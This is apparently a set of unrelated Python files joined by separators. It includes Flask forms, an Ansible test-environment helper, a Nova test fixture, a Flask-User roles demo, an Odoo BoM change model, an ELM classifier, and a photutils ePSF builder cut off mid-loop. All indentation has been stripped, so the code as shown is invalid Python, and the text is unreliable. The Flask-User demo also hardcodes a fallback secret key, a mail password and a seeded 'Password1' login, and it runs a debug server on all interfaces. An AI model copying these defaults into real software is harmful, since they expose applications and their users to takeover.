decompressor = DECOMPRESSERS.get(compression)
if decompressor:
reader = decompressor(reader)
return reader
|
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, BooleanField, SelectField,TextAreaField
from wtforms.validators import Required,Length,Email,Regexp
from wtforms import ValidationError
from ..models import Role,User
from flask_pagedown.fields import PageDownField
class NameForm(FlaskForm):
name = StringField('What is your name?', validators=[Required()])
submit = SubmitField('Submit')
class EditProfileForm(FlaskForm):
name = StringField('Real name',validators=[Length(0,64)])
location = StringField('Location',validators=[Length(0,64)])
about_me = TextAreaField('About me')
submit = SubmitField('Submit')
class EditProfileAdminForm(FlaskForm):
email = StringField('Email',validators=[Required(),Length(1,64),Email()])
username = StringField('Username', validators=[Required(),Length(1,64),Regexp('^[A-Za-z][A-Za-z0-9_.]*$',0,'Usernames must have only letters, numbers, dots or underscors')])
confirmed = BooleanField('Confirmed')
role = SelectField('Role',coerce=int)
name = StringField('Real name', validators=[Length(0,64)])
location = StringField('Location',validators=[Length(0,64)])
about_me = TextAreaField('About me')
submit = SubmitField('Submit')
def __init__(self,user,*args,**kwargs):
super(EditProfileAdminForm,self).__init__(*args,**kwargs)
self.role.choices = [(role.id,role.name) for role in Role.query.order_by(Role.name).all()]
self.user = user
def validate_email(self,field):
if field.data != self.user.email and User.query.filter_by(email=field.data).first():
raise ValidationError('Email already registered')
def validate_username(self,field):
if field.data != self.user.username and User.query.filter_by(username=field.data).first():
raise ValidationError('Username already in use.')
class PostForm(FlaskForm):
body = PageDownField("What's on your mind?",validators=[Required()])
submit = SubmitField('Submit')
class CommentForm(FlaskForm):
body = StringField('',validators=[Required()])
submit = SubmitField('Submit')
|
"""Miscellaneous utility functions and classes specific to ansible cli tools."""
from __future__ import absolute_import, print_function
import os
from lib.util import common_environment
def ansible_environment(args, color=True):
"""
:type args: CommonConfig
:type color: bool
:rtype: dict[str, str]
"""
env = common_environment()
path = env['PATH']
ansible_path = os.path.join(os.getcwd(), 'bin')
if not path.startswith(ansible_path + os.pathsep):
path = ansible_path + os.pathsep + path
ansible_config = '/dev/null'
if os.path.isfile('test/integration/%s.cfg' % args.command):
ansible_config = os.path.abspath('test/integration/%s.cfg' % args.command)
ansible = dict(
ANSIBLE_FORCE_COLOR='%s' % 'true' if args.color and color else 'false',
ANSIBLE_DEPRECATION_WARNINGS='false',
ANSIBLE_CONFIG=ansible_config,
ANSIBLE_HOST_KEY_CHECKING='false',
PYTHONPATH=os.path.abspath('lib'),
PAGER='/bin/cat',
PATH=path,
)
env.update(ansible)
if args.debug:
env.update(dict(ANSIBLE_DEBUG='true'))
return env
|
# Copyright 2013 Red Hat Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from nova import block_device
from nova.openstack.common import timeutils
class FakeDbBlockDeviceDict(block_device.BlockDeviceDict):
"""Defaults db fields - useful for mocking database calls."""
def __init__(self, bdm_dict=None, anon=False, **kwargs):
bdm_dict = bdm_dict or {}
db_id = bdm_dict.pop('id', 1)
instance_uuid = bdm_dict.pop('instance_uuid', str(uuid.uuid4()))
super(FakeDbBlockDeviceDict, self).__init__(bdm_dict=bdm_dict,
**kwargs)
fake_db_fields = {'instance_uuid': instance_uuid,
'deleted_at': None,
'deleted': 0}
if not anon:
fake_db_fields['id'] = db_id
fake_db_fields['created_at'] = timeutils.utcnow()
fake_db_fields['updated_at'] = timeutils.utcnow()
self.update(fake_db_fields)
def AnonFakeDbBlockDeviceDict(bdm_dict, **kwargs):
return FakeDbBlockDeviceDict(bdm_dict=bdm_dict, anon=True, **kwargs)
|
import os
from flask import Flask, render_template_string, request
from flask_mail import Mail
from flask_sqlalchemy import SQLAlchemy
from flask_user import login_required, SQLAlchemyAdapter, UserManager, UserMixin
from flask_user import roles_required
# Use a Class-based config to avoid needing a 2nd file
# os.getenv() enables configuration through OS environment variables
class ConfigClass(object):
# Flask settings
SECRET_KEY = os.getenv('SECRET_KEY', 'THIS IS AN INSECURE SECRET')
SQLALCHEMY_DATABASE_URI = os.getenv('DATABASE_URL', 'sqlite:///single_file_app.sqlite')
CSRF_ENABLED = True
MAIL_USERNAME = os.getenv('MAIL_USERNAME', '[email protected]')
MAIL_PASSWORD = os.getenv('MAIL_PASSWORD', 'Wewillrockyou')
MAIL_DEFAULT_SENDER = os.getenv('MAIL_DEFAULT_SENDER', '"MyApp" <[email protected]>')
MAIL_SERVER = os.getenv('MAIL_SERVER', 'smtp.gmail.com')
MAIL_PORT = int(os.getenv('MAIL_PORT', '465'))
MAIL_USE_SSL = int(os.getenv('MAIL_USE_SSL', True))
# Flask-User settings
USER_APP_NAME = "Oreo Story" # Used by email templates
def create_app(test_config=None): # For automated tests
# Setup Flask and read config from ConfigClass defined above
app = Flask(__name__)
app.config.from_object(__name__+'.ConfigClass')
# Load local_settings.py if file exists # For automated tests
try: app.config.from_object('local_settings')
except: pass
# Load optional test_config # For automated tests
if test_config:
app.config.update(test_config)
# Initialize Flask extensions
mail = Mail(app) # Initialize Flask-Mail
db = SQLAlchemy(app) # Initialize Flask-SQLAlchemy
# Define the User data model. Make sure to add flask.ext.user UserMixin!!
class User(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key=True)
# User authentication information
username = db.Column(db.String(50), nullable=False, unique=True)
password = db.Column(db.String(255), nullable=False, server_default='')
reset_password_token = db.Column(db.String(100), nullable=False, server_default='')
# User email information
email = db.Column(db.String(255), nullable=False, unique=True)
confirmed_at = db.Column(db.DateTime())
# User information
active = db.Column('is_active', db.Boolean(), nullable=False, server_default='0')
first_name = db.Column(db.String(100), nullable=False, server_default='')
last_name = db.Column(db.String(100), nullable=False, server_default='')
# Relationships
roles = db.relationship('Role', secondary='user_roles',
backref=db.backref('users', lazy='dynamic'))
# Define the Role data model
class Role(db.Model):
id = db.Column(db.Integer(), primary_key=True)
name = db.Column(db.String(50), unique=True)
# Define the UserRoles data model
class UserRoles(db.Model):
id = db.Column(db.Integer(), primary_key=True)
user_id = db.Column(db.Integer(), db.ForeignKey('user.id', ondelete='CASCADE'))
role_id = db.Column(db.Integer(), db.ForeignKey('role.id', ondelete='CASCADE'))
# Reset all the database tables
db.create_all()
# Setup Flask-User
db_adapter = SQLAlchemyAdapter(db, User)
user_manager = UserManager(db_adapter, app)
# Create 'user007' user with 'secret' and 'agent' roles
if not User.query.filter(User.username=='user007').first():
user1 = User(username='user007', email='[email protected]', active=True,
password=user_manager.hash_password('Password1'))
user1.roles.append(Role(name='secret'))
user1.roles.append(Role(name='agent'))
db.session.add(user1)
db.session.commit()
# The Home page is accessible to anyone
@app.route('/')
def home_page():
return render_template_string("""
{% extends "base.html" %}
{% block content %}
<h2>Home page</h2>
<p>This page can be accessed by anyone.</p><br/>
<p><a href={{ url_for('home_page') }}>Home page</a> (anyone)</p>
<p><a href={{ url_for('members_page') }}>Members page</a> (login required)</p>
<p><a href={{ url_for('special_page') }}>Special page</a> (login with username 'user007' and password 'Password1')</p>
{% endblock %}
""")
# The Members page is only accessible to authenticated users
@app.route('/members')
@login_required # Use of @login_required decorator
def members_page():
return render_template_string("""
{% extends "base.html" %}
{% block content %}
<h2>Members page</h2>
<p>This page can only be accessed by authenticated users.</p><br/>
<p><a href={{ url_for('home_page') }}>Home page</a> (anyone)</p>
<p><a href={{ url_for('members_page') }}>Members page</a> (login required)</p>
<p><a href={{ url_for('special_page') }}>Special page</a> (login with username 'user007' and password 'Password1')</p>
{% endblock %}
""")
# The Special page requires a user with 'special' and 'sauce' roles or with 'special' and 'agent' roles.
@app.route('/special')
@roles_required('secret', ['sauce', 'agent']) # Use of @roles_required decorator
def special_page():
return render_template_string("""
{% extends "base.html" %}
{% block content %}
<h2>Special Page</h2>
<p>This page can only be accessed by user007.</p><br/>
<p><a href={{ url_for('home_page') }}>Home page</a> (anyone)</p>
<p><a href={{ url_for('members_page') }}>Members page</a> (login required)</p>
<p><a href={{ url_for('special_page') }}>Special page</a> (login with username 'user007' and password 'Password1')</p>
{% endblock %}
""")
return app
# Start development web server
if __name__=='__main__':
app = create_app()
app.run(host='0.0.0.0', port=5000, debug=True)
|
# -*- coding: utf-8 -*-
##############################################################################
# For copyright and license notices, see __openerp__.py file in root directory
##############################################################################
from openerp import models, fields, api, exceptions, _
from datetime import datetime as dt
class MrpBomChange(models.Model):
_name = 'mrp.bom.change'
_description = 'Mrp BoM Component Change'
@api.one
@api.depends('old_component')
def _calc_boms(self):
self.boms = [(6, 0, [])]
if self.old_component:
for bom in self.env['mrp.bom'].search([]):
bom_lines = bom.bom_line_ids.filtered(
lambda x: x.product_id.id == self.old_component.id)
if bom_lines:
self.boms = [(4, bom.id)]
name = fields.Char('Name', required=True)
new_component = fields.Many2one('product.product', 'New Component',
required=True)
old_component = fields.Many2one('product.product', 'Old Component',
required=True)
create_new_version = fields.Boolean(
string="Create new BoM version", help='Check this field if you want to'
' create a new version of the BOM before modifying the component')
boms = fields.Many2many(
comodel_name='mrp.bom',
relation='rel_mrp_bom_change', column1='bom_change_id',
column2='bom_id', string='BoMs', copy=False, store=True, readonly=True,
compute='_calc_boms')
date = fields.Date('Change Date', readonly=True)
user = fields.Many2one('res.users', 'Changed By', readonly=True)
reason = fields.Char('Reason')
@api.multi
def do_component_change(self):
self.ensure_one()
if not self.old_component or not self.new_component:
raise exceptions.Warning(_("Not Components selected!"))
if not self.boms:
raise exceptions.Warning(_("There isn't any BoM for selected "
"component"))
for bom in self.boms:
bom_lines = bom.bom_line_ids.filtered(
lambda x: x.product_id.id == self.old_component.id)
if self.create_new_version:
new_bom = bom._copy_bom()
bom.button_historical()
new_bom.button_activate()
self.boms = [(3, bom.id)]
self.boms = [(4, new_bom.id)]
bom_lines = new_bom.bom_line_ids.filtered(
lambda x: x.product_id.id == self.old_component.id)
bom_lines.write({'product_id': self.new_component.id})
self.write({'date': dt.now(), 'user': self.env.uid})
return {'name': _('Bill of Material'),
'view_type': 'form',
'view_mode': 'tree,form',
'res_model': 'mrp.bom',
'type': 'ir.actions.act_window',
'domain': [('id', 'in', self.boms.mapped('id'))]
}
|
import numpy as np
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.metrics import mean_squared_error
from sklearn.linear_model import LogisticRegression, Ridge
from sklearn.pipeline import Pipeline
def relu(X):
"""Rectified Linear Unit"""
return np.clip(X, 0, None)
def sigmoid(X):
return 1 / (1 + np.exp(-X))
STR_TO_ACTIVATION = dict(
relu=relu,
sigmoid=sigmoid,
tanh=np.tanh,
)
class ElmTransform(BaseEstimator, TransformerMixin):
def __init__(self,
n_hidden,
activation_function="tanh",
std=1.0):
self.n_hidden = n_hidden
# assume it's a function if it is not in the dict
self.activate_ = STR_TO_ACTIVATION.get(activation_function,
activation_function)
self.std = std
def fit(self, X, y=None):
X = np.array(X)
self.weights_ = self.std * np.random.randn(X.shape[1], self.n_hidden)
self.biases_ = self.std * np.random.randn(self.n_hidden)
return self
def transform(self, X, y=None):
X = np.array(X)
p = X.dot(self.weights_)
return self.activate_(p + self.biases_)
def ElmRegressor(n_hidden, activation_function="tanh", std=1.0, **kwargs):
return Pipeline([("elm", ElmTransform(n_hidden, activation_function, std)),
("ridge", Ridge(**kwargs))])
def ElmClassifier(n_hidden, activation_function="tanh", std=1.0, **kwargs):
return Pipeline([("elm", ElmTransform(n_hidden, activation_function, std)),
("logreg", LogisticRegression(**kwargs))])
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This module provides tools to build and fit an effective PSF (ePSF)
based on Anderson and King (2000; PASP 112, 1360) and Anderson (2016),
ISR WFC3 2016-12.
"""
import copy
import time
import warnings
from astropy.modeling.fitting import LevMarLSQFitter
from astropy.nddata.utils import (overlap_slices, PartialOverlapError,
NoOverlapError)
from astropy.stats import SigmaClip
from astropy.utils.exceptions import AstropyUserWarning
import numpy as np
from .epsf_stars import EPSFStar, EPSFStars, LinkedEPSFStar
from .models import EPSFModel
from ..centroids import centroid_com, centroid_epsf
from ..utils._round import _py2intround
try:
import bottleneck # pylint: disable=W0611
HAS_BOTTLENECK = True
except ImportError:
HAS_BOTTLENECK = False
__all__ = ['EPSFFitter', 'EPSFBuilder']
class EPSFFitter:
"""
Class to fit an ePSF model to one or more stars.
Parameters
----------
fitter : `astropy.modeling.fitting.Fitter`, optional
A `~astropy.modeling.fitting.Fitter` object.
fit_boxsize : int, tuple of int, or `None`, optional
The size (in pixels) of the box centered on the star to be used
for ePSF fitting. This allows using only a small number of
central pixels of the star (i.e., where the star is brightest)
for fitting. If ``fit_boxsize`` is a scalar then a square box
of size ``fit_boxsize`` will be used. If ``fit_boxsize`` has
two elements, they should be in ``(ny, nx)`` order. The size
must be greater than or equal to 3 pixels for both axes. If
`None`, the fitter will use the entire star image.
fitter_kwargs : dict-like, optional
Any additional keyword arguments (except ``x``, ``y``, ``z``, or
``weights``) to be passed directly to the ``__call__()`` method
of the input ``fitter``.
"""
def __init__(self, fitter=LevMarLSQFitter(), fit_boxsize=5,
**fitter_kwargs):
self.fitter = fitter
self.fitter_has_fit_info = hasattr(self.fitter, 'fit_info')
if fit_boxsize is not None:
fit_boxsize = np.atleast_1d(fit_boxsize).astype(int)
if len(fit_boxsize) == 1:
fit_boxsize = np.repeat(fit_boxsize, 2)
min_size = 3
if any([size < min_size for size in fit_boxsize]):
raise ValueError(f'size must be >= {min_size} for x and y')
self.fit_boxsize = fit_boxsize
# remove any fitter keyword arguments that we need to set
remove_kwargs = ['x', 'y', 'z', 'weights']
fitter_kwargs = copy.deepcopy(fitter_kwargs)
for kwarg in remove_kwargs:
if kwarg in fitter_kwargs:
del fitter_kwargs[kwarg]
self.fitter_kwargs = fitter_kwargs
def __call__(self, epsf, stars):
"""
Fit an ePSF model to stars.
Parameters
----------
epsf : `EPSFModel`
An ePSF model to be fitted to the stars.
stars : `EPSFStars` object
The stars to be fit. The center coordinates for each star
should be as close as possible to actual centers. For stars
than contain weights, a weighted fit of the ePSF to the star
will be performed.
Returns
-------
fitted_stars : `EPSFStars` object
The fitted stars. The ePSF-fitted center position and flux
are stored in the ``center`` (and ``cutout_center``) and
``flux`` attributes.
"""
if len(stars) == 0:
return stars
if not isinstance(epsf, EPSFModel):
raise TypeError('The input epsf must be an EPSFModel.')
# make a copy of the input ePSF
epsf = epsf.copy()
# perform the fit
fitted_stars = []
for star in stars:
if isinstance(star, EPSFStar):
fitted_star = self._fit_star(epsf, star, self.fitter,
self.fitter_kwargs,
self.fitter_has_fit_info,
self.fit_boxsize)
elif isinstance(star, LinkedEPSFStar):
fitted_star = []
for linked_star in star:
fitted_star.append(
self._fit_star(epsf, linked_star, self.fitter,
self.fitter_kwargs,
self.fitter_has_fit_info,
self.fit_boxsize))
fitted_star = LinkedEPSFStar(fitted_star)
fitted_star.constrain_centers()
else:
raise TypeError('stars must contain only EPSFStar and/or '
'LinkedEPSFStar objects.')
fitted_stars.append(fitted_star)
return EPSFStars(fitted_stars)
def _fit_star(self, epsf, star, fitter, fitter_kwargs,
fitter_has_fit_info, fit_boxsize):
"""
Fit an ePSF model to a single star.
The input ``epsf`` will usually be modified by the fitting
routine in this function. Make a copy before calling this
function if the original is needed.
"""
if fit_boxsize is not None:
try:
xcenter, ycenter = star.cutout_center
large_slc, _ = overlap_slices(star.shape, fit_boxsize,
(ycenter, xcenter),
mode='strict')
except (PartialOverlapError, NoOverlapError):
warnings.warn('The star at ({star.center[0]}, '
'{star.center[1]}) cannot be fit because '
'its fitting region extends beyond the star '
'cutout image.', AstropyUserWarning)
star = copy.deepcopy(star)
star._fit_error_status = 1
return star
data = star.data[large_slc]
weights = star.weights[large_slc]
# define the origin of the fitting region
x0 = large_slc[1].start
y0 = large_slc[0].start
else:
# use the entire cutout image
data = star.data
weights = star.weights
# define the origin of the fitting region
x0 = 0
y0 = 0
# Define positions in the undersampled grid. The fitter will
# evaluate on the defined interpolation grid, currently in the
# range [0, len(undersampled grid)].
yy, xx = np.indices(data.shape, dtype=float)
xx = xx + x0 - star.cutout_center[0]
yy = yy + y0 - star.cutout_center[1]
# define the initial guesses for fitted flux and shifts
epsf.flux = star.flux
epsf.x_0 = 0.0
epsf.y_0 = 0.0
try:
fitted_epsf = fitter(model=epsf, x=xx, y=yy, z=data,
weights=weights, **fitter_kwargs)
except TypeError:
# fitter doesn't support weights
fitted_epsf = fitter(model=epsf, x=xx, y=yy, z=data,
**fitter_kwargs)
fit_error_status = 0
if fitter_has_fit_info:
fit_info = copy.copy(fitter.fit_info)
if 'ierr' in fit_info and fit_info['ierr'] not in [1, 2, 3, 4]:
fit_error_status = 2 # fit solution was not found
else:
fit_info = None
# compute the star's fitted position
x_center = star.cutout_center[0] + fitted_epsf.x_0.value
y_center = star.cutout_center[1] + fitted_epsf.y_0.value
star = copy.deepcopy(star)
star.cutout_center = (x_center, y_center)
# set the star's flux to the ePSF-fitted flux
star.flux = fitted_epsf.flux.value
star._fit_info = fit_info
star._fit_error_status = fit_error_status
return star
class EPSFBuilder:
"""
Class to build an effective PSF (ePSF).
See `Anderson and King (2000; PASP 112, 1360)
<https://ui.adsabs.harvard.edu/abs/2000PASP..112.1360A/abstract>`_
and `Anderson (2016), ISR WFC3 2016-12
<https://www.stsci.edu/files/live/sites/www/files/home/hst/instrumentation/wfc3/documentation/instrument-science-reports-isrs/_documents/2016/WFC3-2016-12.pdf>`_
for details.
Parameters
----------
oversampling : int or tuple of two int, optional
The oversampling factor(s) of the ePSF relative to the input
``stars`` along the x and y axes. The ``oversampling`` can
either be a single float or a tuple of two floats of the form
``(x_oversamp, y_oversamp)``. If ``oversampling`` is a scalar
then the oversampling will be the same for both the x and y
axes.
shape : float, tuple of two floats, or `None`, optional
The shape of the output ePSF. If the ``shape`` is not `None`,
it will be derived from the sizes of the input ``stars`` and the
ePSF oversampling factor. If the size is even along any axis,
it will be made odd by adding one. The output ePSF will always
have odd sizes along both axes to ensure a well-defined central
pixel.
smoothing_kernel : {'quartic', 'quadratic'}, 2D `~numpy.ndarray`, or `None`
The smoothing kernel to apply to the ePSF. The predefined
``'quartic'`` and ``'quadratic'`` kernels are derived from
fourth and second degree polynomials, respectively.
Alternatively, a custom 2D array can be input. If `None` then
no smoothing will be performed.
recentering_func : callable, optional
A callable object (e.g., function or class) that is used to
calculate the centroid of a 2D array. The callable must accept
a 2D `~numpy.ndarray`, have a ``mask`` keyword and optionally
``error`` and ``oversampling`` keywords. The callable object
must return a tuple of two 1D `~numpy.ndarray` variables,
representing the x and y centroids.
recentering_maxiters : int, optional
The maximum number of recentering iterations to perform during
each ePSF build iteration.
fitter : `EPSFFitter` object, optional
A `EPSFFitter` object use to fit the ePSF to stars. To set
fitter options, a new object with specific options should be
passed in - the default uses simply the default options. To see
more of these options, see the `EPSFFitter` documentation.
maxiters : int, optional
The maximum number of iterations to perform.
progress_bar : bool, option
Whether to print the progress bar during the build iterations.
norm_radius : float, optional
The pixel radius over which the ePSF is normalized.
shift_val : float, optional
The undersampled value at which to compute the shifts. It must
be a strictly positive number.
recentering_boxsize : float or tuple of two floats, optional
The size (in pixels) of the box used to calculate the centroid
of the ePSF during each build iteration. If a single integer
number is provided, then a square box will be used. If two
values are provided, then they should be in ``(ny, nx)`` order.
center_accuracy : float, optional
The desired accuracy for the centers of stars. The building
iterations will stop if the centers of all the stars change by
less than ``center_accuracy`` pixels between iterations. All
stars must meet this condition for the loop to exit.
flux_residual_sigclip : `~astropy.stats.SigmaClip` object, optional
A `~astropy.stats.SigmaClip` object used to determine which pixels
are ignored based on the star sampling flux residuals, when
computing the average residual of ePSF grid points in each iteration
step.
"""
def __init__(self, oversampling=4., shape=None,
smoothing_kernel='quartic', recentering_func=centroid_com,
recentering_maxiters=20, fitter=EPSFFitter(), maxiters=10,
progress_bar=True, norm_radius=5.5, shift_val=0.5,
recentering_boxsize=(5, 5), center_accuracy=1.0e-3,
flux_residual_sigclip=SigmaClip(sigma=3, cenfunc='median',
maxiters=10)):
if oversampling is None:
raise ValueError("'oversampling' must be specified.")
oversampling = np.atleast_1d(oversampling).astype(int)
if len(oversampling) == 1:
oversampling = np.repeat(oversampling, 2)
if np.any(oversampling <= 0.0):
raise ValueError('oversampling must be a positive number.')
self._norm_radius = norm_radius
self._shift_val = shift_val
self.oversampling = oversampling
self.shape = self._init_img_params(shape)
if self.shape is not None:
self.shape = self.shape.astype(int)
self.recentering_func = recentering_func
self.recentering_maxiters = recentering_maxiters
self.recentering_boxsize = self._init_img_params(recentering_boxsize)
self.recentering_boxsize = self.recentering_boxsize.astype(int)
self.smoothing_kernel = smoothing_kernel
if not isinstance(fitter, EPSFFitter):
raise TypeError('fitter must be an EPSFFitter instance.')
self.fitter = fitter
if center_accuracy <= 0.0:
raise ValueError('center_accuracy must be a positive number.')
self.center_accuracy_sq = center_accuracy**2
maxiters = int(maxiters)
if maxiters <= 0:
raise ValueError("'maxiters' must be a positive number.")
self.maxiters = maxiters
self.progress_bar = progress_bar
if not isinstance(flux_residual_sigclip, SigmaClip):
raise ValueError("'flux_residual_sigclip' must be an"
" astropy.stats.SigmaClip function.")
self.flux_residual_sigclip = flux_residual_sigclip
# store each ePSF build iteration
self._epsf = []
def __call__(self, stars):
return self.build_epsf(stars)
@staticmethod
def _init_img_params(param):
"""
Initialize 2D image-type parameters that can accept either a
single or two values.
"""
if param is not None:
param = np.atleast_1d(param)
if len(param) == 1:
param = np.repeat(param, 2)
return param
def _create_initial_epsf(self, stars):
"""
Create an initial `EPSFModel` object.
The initial ePSF data are all zeros.
If ``shape`` is not specified, the shape of the ePSF data array
is determined from the shape of the input ``stars`` and the
oversampling factor. If the size is even along any axis, it
will be made odd by adding one. The output ePSF will always
have odd sizes along both axes to ensure a central pixel.
Parameters
----------
stars : `EPSFStars` object
The stars used to build the ePSF.
Returns
-------
epsf : `EPSFModel`
The initial ePSF model.
"""
norm_radius = self._norm_radius
shift_val = self._shift_val
oversampling = self.oversampling
shape = self.shape
# define the ePSF shape
if shape is not None:
shape = np.atleast_1d(shape).astype(int)
if len(shape) == 1:
shape = np.repeat(shape, 2)
else:
# Stars class should have odd-sized dimensions, and thus we
# get the oversampled shape as oversampling * len + 1; if
# len=25, then newlen=101, for example.
x_shape = (np.ceil(stars._max_shape[0]) * oversampling[0] +
1).astype(int)
y_shape = (np.ceil(stars._max_shape[1]) * oversampling[1] +
1).astype(int)
shape = np.array((y_shape, x_shape))
# verify odd sizes of shape
shape = [(i + 1) if i % 2 == 0 else i for i in shape]
data = np.zeros(shape, dtype=float)
# ePSF origin should be in the undersampled pixel units, not the
# oversampled grid units. The middle, fractional (as we wish for
# the center of the pixel, so the center should be at (v.5, w.5)
# detector pixels) value is simply the average of the two values
# at the extremes.
xcenter = stars._max_shape[0] / 2.
ycenter = stars._max_shape[1] / 2.
epsf = EPSFModel(data=data, origin=(xcenter, ycenter),
oversampling=oversampling, norm_radius=norm_radius,
shift_val=shift_val)
return epsf
def _resample_residual(self, star, epsf):
"""
Compute a normalized residual image in the oversampled ePSF
grid.
A normalized residual image is calculated by subtracting the
normalized ePSF model from the normalized star at the location
of the star in the undersampled grid. The normalized residual
image is then resampled from the undersampled star grid to the
oversampled ePSF grid.
Parameters
----------
star : `EPSFStar` object
A single star object.
epsf : `EPSFModel` object
The ePSF model.
Returns
-------
image : 2D `~numpy.ndarray`
A 2D image containing the resampled residual image. The
image contains NaNs where there is no data.
"""
# Compute the normalized residual by subtracting the ePSF model
# from the normalized star at the location of the star in the
# undersampled grid.
x = star._xidx_centered
y = star._yidx_centered
stardata = (star._data_values_normalized -
epsf.evaluate(x=x, y=y, flux=1.0, x_0=0.0, y_0=0.0))
x = epsf.oversampling[0] * star._xidx_centered
y = epsf.oversampling[1] * star._yidx_centered
epsf_xcenter, epsf_ycenter = (int((epsf.data.shape[1] -
1) / 2),
int((epsf.data.shape[0] -
1) / 2))
xidx = _py2intround(x + epsf_xcenter)
yidx = _py2intround(y + epsf_ycenter)
resampled_img = np.full(epsf.shape, np.nan)
mask = np.logical_and(np.logical_and(xidx >= 0,
xidx < epsf.shape[1]),
np.logical_and(yidx >= 0,
yidx < epsf.shape[0]))
xidx_ = xidx[mask]
yidx_ = yidx[mask]
resampled_img[yidx_, xidx_] = stardata[mask]
return resampled_img
def _resample_residuals(self, stars, epsf):
"""
Compute normalized residual images for all the input stars.
Parameters
----------
stars : `EPSFStars` object
The stars used to build the ePSF.
epsf : `EPSFModel` object
The ePSF model.
Returns
-------
epsf_resid : 3D `~numpy.ndarray`
A 3D cube containing the resampled residual images.
"""
shape = (stars.n_good_stars, epsf.shape[0], epsf.shape[1])
epsf_resid = np.zeros(shape)
for i, star in enumerate(stars.all_good_stars):
epsf_resid[i, :, :] = self._resample_residual(star, epsf)
return epsf_resid
def _smooth_epsf(self, epsf_data):
"""
Smooth the ePSF array by convolving it with a kernel.
Parameters
----------
epsf_data : 2D `~numpy.ndarray`
A 2D array containing the ePSF image.
Returns
-------
result : 2D `~numpy.ndarray`
The smoothed (convolved) ePSF data.
"""
from scipy.ndimage import convolve
if self.smoothing_kernel is None:
return epsf_data
# do this check first as comparing a ndarray to string causes a warning
elif isinstance(self.smoothing_kernel, np.ndarray):
kernel = self.smoothing_kernel
elif self.smoothing_kernel == 'quartic':
# from Polynomial2D fit with degree=4 to 5x5 array of
# zeros with 1. at the center
# Polynomial2D(4, c0_0=0.04163265, c1_0=-0.76326531,
# c2_0=0.99081633, c3_0=-0.4, c4_0=0.05,
# c0_1=-0.76326531, c0_2=0.99081633, c0_3=-0.4,
# c0_4=0.05, c1_1=0.32653061, c1_2=-0.08163265,
# c1_3=0., c2_1=-0.08163265, c2_2=0.02040816,
# c3_1=-0.)>
kernel = np.array(
[[+0.041632, -0.080816, 0.078368, -0.080816, +0.041632],
[-0.080816, -0.019592, 0.200816, -0.019592, -0.080816],
[+0.078368, +0.200816, 0.441632, +0.200816, +0.078368],
[-0.080816, -0.019592, 0.200816, -0.019592, -0.080816],
[+0.041632, -0.080816, 0.078368, -0.080816, +0.041632]])
elif self.smoothing_kernel == 'quadratic':
# from Polynomial2D fit with degree=2 to 5x5 array of
# zeros with 1. at the center
# Polynomial2D(2, c0_0=-0.07428571, c1_0=0.11428571,
# c2_0=-0.02857143, c0_1=0.11428571,
# c0_2=-0.02857143, c1_1=-0.)
kernel = np.array(
[[-0.07428311, 0.01142786, 0.03999952, 0.01142786,
-0.07428311],
[+0.01142786, 0.09714283, 0.12571449, 0.09714283,
+0.01142786],
[+0.03999952, 0.12571449, 0.15428215, 0.12571449,
+0.03999952],
[+0.01142786, 0.09714283, 0.12571449, 0.09714283,
+0.01142786],
[-0.07428311, 0.01142786, 0.03999952, 0.01142786,
-0.07428311]])
else:
raise TypeError('Unsupported kernel.')
return convolve(epsf_data, kernel)
def _recenter_epsf(self, epsf, centroid_func=centroid_com,
box_size=(5, 5), maxiters=20, center_accuracy=1.0e-4):
"""
Calculate the center of the ePSF data and shift the data so the
ePSF center is at the center of the ePSF data array.
Parameters
----------
epsf : `EPSFModel` object
The ePSF model.
centroid_func : callable, optional
A callable object (e.g., function or class) that is used
to calculate the centroid of a 2D array. The callable must
accept a 2D `~numpy.ndarray`, have a ``mask`` keyword
and optionally an ``error`` keyword. The callable object
must return a tuple of two 1D `~numpy.ndarray` variables,
representing the x and y centroids.
box_size : float or tuple of two floats, optional
The size (in pixels) of the box used to calculate the
centroid of the ePSF during each build iteration. If a
single integer number is provided, then a square box will be
used. If two values are provided, then they should be in
``(ny, nx)`` order.
maxiters : int, optional
The maximum number of recentering iterations to perform.
center_accuracy : float, optional
The desired accuracy for the centers of stars. The building
iterations will stop if the center of the ePSF changes by
less than ``center_accuracy`` pixels between iterations.
Returns
-------
result : 2D `~numpy.ndarray`
The recentered ePSF data.
"""
epsf_data = epsf._data
epsf = EPSFModel(data=epsf._data, origin=epsf.origin,
oversampling=epsf.oversampling,
norm_radius=epsf._norm_radius,
shift_val=epsf._shift_val, normalize=False)
xcenter, ycenter = epsf.origin
y, x = np.indices(epsf._data.shape, dtype=float)
x /= epsf.oversampling[0]
y /= epsf.oversampling[1]
dx_total, dy_total = 0, 0
iter_num = 0
center_accuracy_sq = center_accuracy ** 2
center_dist_sq = center_accuracy_sq + 1.e6
center_dist_sq_prev = center_dist_sq + 1
while (iter_num < maxiters and
center_dist_sq >= center_accuracy_sq):
iter_num += 1
# Anderson & King (2000) recentering function depends
# on specific pixels, and thus does not need a cutout
if self.recentering_func == centroid_epsf:
epsf_cutout = epsf_data
else:
slices_large, _ = overlap_slices(epsf_data.shape, box_size,
(ycenter *
self.oversampling[1],
xcenter *
self.oversampling[0]))
epsf_cutout = epsf_data[slices_large]
mask = ~np.isfinite(epsf_cutout)
try:
# find a new center position
xcenter_new, ycenter_new = centroid_func(
epsf_cutout, mask=mask, oversampling=epsf.oversampling,
shift_val=epsf._shift_val)
except TypeError:
# centroid_func doesn't accept oversampling and/or shift_val
# keywords - try oversampling alone
try:
xcenter_new, ycenter_new = centroid_func(
epsf_cutout, mask=mask, oversampling=epsf.oversampling)
except TypeError:
# centroid_func doesn't accept oversampling and
# shift_val
xcenter_new, ycenter_new = centroid_func(epsf_cutout,
mask=mask)
if self.recentering_func != centroid_epsf:
xcenter_new += slices_large[1].start/self.oversampling[0]
ycenter_new += slices_large[0].start/self.oversampling[1]
# Calculate the shift; dx = i - x_star so if dx was positively
# incremented then x_star was negatively incremented for a given i.
# We will therefore actually subsequently subtract dx from xcenter
# (or x_star).
